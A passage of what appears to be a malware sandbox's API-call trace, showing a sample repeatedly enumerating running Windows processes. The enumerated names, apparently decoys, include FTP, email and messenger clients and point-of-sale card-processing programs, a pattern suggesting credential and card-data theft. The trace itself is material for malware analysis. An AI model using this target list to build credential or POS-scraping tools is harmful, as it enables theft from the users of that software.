th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0243.334] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0243.335] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0243.337] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0243.338] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0243.344] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0243.345] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0243.346] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0243.348] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0243.349] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0243.352] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0243.390] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0243.393] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0243.395] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0243.397] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0243.400] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0243.405] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0243.407] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0243.409] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0243.410] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0243.412] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0243.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0243.416] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0243.420] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0243.422] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0243.423] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0243.425] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0243.426] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0243.428] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0243.430] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0243.431] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0243.483] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0243.485] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0243.487] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0243.488] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0243.490] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0243.491] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0243.493] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0243.495] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0243.499] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0243.501] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0243.502] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0243.504] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0243.505] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0243.507] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0243.508] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0243.510] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0243.516] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0243.517] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0243.519] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.520] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0243.522] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0243.524] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0243.551] CloseHandle (hObject=0x1018) returned 1 [0243.551] Sleep (dwMilliseconds=0x64) [0243.844] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0243.860] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.861] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.863] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.864] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.866] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.867] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.869] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.873] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.874] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.876] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.877] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.879] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.880] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.882] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.883] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.884] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.918] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.920] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.922] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.924] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.925] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0243.927] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0243.928] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.930] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.931] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0243.936] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0243.938] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0243.939] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0243.941] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.942] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0243.944] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.948] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 